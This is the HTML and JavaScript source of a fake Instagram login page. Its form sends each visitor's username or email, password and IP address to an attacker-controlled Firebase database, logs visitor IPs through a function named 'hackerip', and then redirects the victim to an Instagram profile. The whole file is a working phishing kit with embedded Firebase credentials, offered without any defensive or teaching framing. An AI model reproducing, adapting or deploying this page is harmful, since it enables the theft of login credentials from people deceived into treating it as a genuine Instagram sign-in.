
<meta charset="utf-8"/> 
<meta http-equiv="X-UA-Compatible" content="IE=edge"/> 
<meta http-equiv="origin-trial" content=""/>
<meta name="viewport" content="width=device-width, initial-scale=1.0,  maximum-scale=1.0, user-scalable=no, shrink-to-fit=no,  "/>  

<title>instagram</title>
<meta name="description" content=" instagram "/>
<meta name="copyright" content=" instagram ">
<meta name="keywords" content="instagram">
<meta name="author" content="landlead" >
<meta property="og:type" content="website"/>
<meta property="og:site_name" content="instagram"/>
<meta property="og:title" content=" instagram "/>
<meta property="og:description" content="instagram "/>
<meta property="og:url" content=" https://dripoda.github.io/instagram.html "/>
<meta property="og:image"  content="  img/instagram/logoinstagram.png "/>
<meta property="og:image:type" content="image/jpeg">
<meta property="og:locale" content="ar_MA"/>
<meta property="og:locale:alternate" content="fr_MA"/>
<meta property="og:updated_time" content="updatedtime" />  
<meta property="fb:app_id" content=""/>
<link rel="icon" type="image/ico" href="img/instagram/logoinstagram.png "/>


<style>
html {background-color:#fafafa;}
.container{display:grid; align-items:center; justify-content:center; text-align:center;  margin:0px 0px 0px 0px; }
.row{width:auto; height:auto; border:solid 1px #00000040; padding:50px 30px 50px 30px;   display:grid; align-items:center; justify-content:center; text-align:center; position:fixed; left:50%; top:50%;  transform:translate(-50%,-50%); }
  .posimg{display:flex; align-items:center; justify-content:center; text-align:center;}
  .posform{display:flex; align-items:center; justify-content:center; text-align:center;}
   .input1{background-color:#fafafa;  width:300px; height:40px;  border: solid 1px #e3e3e3; border-radius:2px; box-shadow:none;  color:#262626; font:400 12px -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif; text-indent: 9px;  margin-top:3%; }  
   .input1:focus{ outline: none !important;  border:solid 1px #a2a0a0; box-shadow: none; }   
   .input1::placeholder {color:#827f7f; font:200 13px sans-serif;} 
   .inputbtn{background-color:#0095f6; width:300px; height:40px;  border:none; border-radius:2px;  color:white; font:bold 14px sans-serif;}

@media only screen and (max-width:1300px) { }
@media only screen and (max-width:1000px) { }
@media only screen and (max-width:600px) { }
@media only screen and (max-width:360px) {  .row{border:solid 0px #00000040; padding:50px 20px 50px 20px;  }  }
</style>





<html > 
<div class="container" s >
<div class="row">
    <div  class="posimg"> 
	   <img src="img/instagram/instagram.png">  
	</div> 
    <div class="posform" >
        <form  id="myForm"  onsubmit="return insert_post()"  >        
            <br/>        <input  type="text"         placeholder="Phone number, username, or email"    id="email"                        class="input1"                                       oninvalid="this.setCustomValidity('please writing email ')"          oninput="setCustomValidity('')"              required>      
			<br/>        <input  type="password"     placeholder="Password"                            id="password"                     class="input1"                                      oninvalid="this.setCustomValidity('please writing password ')"        oninput="setCustomValidity('')"              required>       
		    <br/><br/>   <input  type="submit"       value="Log In"                                    id="insert"                       class="inputbtn"                   /> 
        </form>
    </div>
</div>
</div>		 
</html>  
		 
		 






<script src="https://www.gstatic.com/firebasejs/8.2.3/firebase.js"></script>  <script> var firebaseConfig = {  apiKey: "AIzaSyDnYkq0QGCb7o9XKVGoKhP6wqscsnsfBWg",   authDomain: "test1-bc9e6.firebaseapp.com",   databaseURL: "https://test1-bc9e6-default-rtdb.firebaseio.com",   projectId: "test1-bc9e6",   storageBucket: "test1-bc9e6.appspot.com",   messagingSenderId: "957083311544",   appId: "1:957083311544:web:17a48631a18dfa51e4434d"    };   firebase.initializeApp(firebaseConfig);  </script>
<script>
function insert_post(json){
var email = document.getElementById("email");
var password = document.getElementById("password");
document.getElementById("insert").onclick = function(){    
  firebase.database().ref('users/' ).push().set({   ip: json.ip,   email:email.value,   password:password.value,      }  );   
  if (document.getElementById("email").value == "" || document.getElementById("password").value == "" ) {   alert("Your email or password was incorrect . Please try again");   return false; }  else { window.location='https://www.instagram.com/hotsaxygirls9053';   }
  infodata();   
  window.onload=function(){  };     
}  
  document.getElementById("myForm").reset();  return false; 
}


function hackerip(json){
var oo = json.ip.toString();
for (var i, i=0; i<oo.length;  i++){  oo = oo.replace(".", "-"); }
firebase.database().ref().child("page_views/" + oo ).set({ip: json.ip});  
}
</script>
<script type="application/javascript" src="https://api.ipify.org/?format=jsonp&callback=insert_post"></script>
<script type="application/javascript" src="https://api.ipify.org/?format=jsonp&callback=hackerip"></script>

